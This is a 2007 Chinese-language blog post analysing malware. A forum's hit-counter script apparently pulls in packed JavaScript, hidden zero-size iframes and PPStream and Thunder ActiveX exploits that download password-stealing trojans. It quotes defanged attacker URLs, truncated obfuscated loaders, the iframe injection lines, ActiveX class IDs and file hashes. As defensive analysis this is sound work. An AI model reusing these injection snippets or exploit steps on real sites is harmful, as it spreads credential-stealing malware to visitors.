某论坛所用计数器利用 PPStream,Thunder等漏洞传播Trojan.PSW.Win32.OnlineGames.xzr等

endurer 原创
2007-09-04 第1

刚才打开本地最近新建的一个网站的论坛时,Kaspersky 报告已检测 恶意程序 Exploit.HTML.IframeBof.

检查网页代码,发现问题出在论坛所用的计数器上:
/---
<script language="JavaScript" charset="gb2312" type="text/javascript" src="hxxp://www**7.i*t**s***un.com/count.php?uuid=1**76*1653&style=text&textcolor=black"></script>
---/

hxxp://www**7.i*t**s***un.com/count.php?uuid=1761653&style=text&textcolor=black 包含代码:
/---
document.writeln("<script src=hxxp:4**h4.us//y**.js><//script>");
---/

hxxp://4**h4.us/y**.js 的内容为:
/---
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String~fromCharCode(c+29):c~toString(36))};if(!''~replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p~replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('T("\\e\\…(略)…107|115'~split('|'),0,{}))
---/

经过2次解密得到源代码,功能是首先输出代码:
/---
<script src="hxxp://o**r*a*.3***168a*.com/S***168/NewJs1.js"></script>
---/
接着判断是否存在名为"Cookie1"的cookie变量,不存在则创建并输出代码:
/---
<iframe width=0 height=0 src="hxxp://o**r*a*.3***168a*.com/S***168/t168.htm"></iframe>
<iframe width=0 height=0 src="hxxp://o**r*a*.3***168a*.com/S***168/t168.gif"></iframe>
---/

从网址上看,很可能是提供计数器的这台服务器中了ARP病毒。

hxxp://o**r*a*.3***168a*.com/S***168/NewJs1.js 的代码为:
/---
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String~fromCharCode(c+29):c~toString(36))};if(!''~replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p~replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('17("\\I…(略)…x57|x48'~split('|'),0,{}))
---/

经2次解密得到原代码,功能是下载 S168.exe,保存到 %windir%,文件名由自定义函数:
/---
function GnMs(n)

 var numberMs = Math~random()*n;
 return '.Temp'+Math~round(numberMs)+'~tmp';

---/
生成,即~Temp****.tmp,其中 * 为数字,然后用 cmd.exe /c 来运行。

文件说明符 : D:/test/S168.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-3 12:21:20
修改时间 : 2007-9-3 12:21:25
访问时间 : 2007-9-3 12:25:44
大小 : 19808 字节 19.352 KB
MD5 : 1d242ccc204a95e834e265ad02bdff09
HSA1: 2AC123F0695A1B48ABC6386004202AFAA1D36F3A

AVP 报为 Trojan-PSW.Win32.Delf.zi

hxxp://o**r*a*.3***168a*.com/S***168/t168.htm 包含JavaScript脚本,功能是使用 自定义函数 mI18() 解密并输出代码,解密后的代码首部为:
/---
<script language=javascript>lT90=3614;function _nr(){return true}onerror=_nr;bH26=3899;;_licensed_to_="huyufeng";</script><html><body><object id="ppc" classid="clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458"></object>
---/
接下来的代码利用 PPStream 漏洞 下载 S168.scr

文件说明符 : D:/test/S168.scr
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-3 12:32:23
修改时间 : 2007-9-3 12:32:24
访问时间 : 2007-9-3 12:34:29
大小 : 19759 字节 19.303 KB
MD5 : c6337eaed604fa0100d8ee953337309b
HSA1: F27686907FB5449184068A05646F2DA6A9A49884

瑞星报为 Trojan.PSW.Win32.OnlineGames.xzr

hxxp://o**r*a*.3***168a*.com/S***168/t168.gif 包含JavaScript脚本,功能是使用 自定义函数 jT74() 解密并输出代码,解密后的代码首部为:
/---
<script language=javascript>gW91=3841;function _nr(){return true}οnerrοr=_nr;fK51=4984;;_licensed_to_="huyufeng";</script>
---/
接下来的代码检测 Windows和IE版本,如果是Win XP,IE6,则输出代码:
/---
<iframe height=0 width=0 src="t168ok.gif"><//iframe>
---/

t168ok.gif 包含JavaScript脚本,功能是使用 自定义函数 pG12() 解密并输出代码,解密后的代码首部为:
/---
<script language=javascript>hA57=933;function _nr(){return true}onerror=_nr;gN17=2076;;_licensed_to_="huyufeng";</script><object classid="clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266" id='target'></object>
---/
接下来的代码利用 Thunder 漏洞下载 S1682.exe

文件说明符 : D:/test/S1682.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-3 12:41:47
修改时间 : 2007-9-3 12:41:48
访问时间 : 2007-9-3 12:42:47
大小 : 1104 字节 1.80 KB
MD5 : 1d15f0de90b397c7ac80bc36a7fc6f77
HSA1: 8B090B880E11B3A861528B144677FF9F829D99BD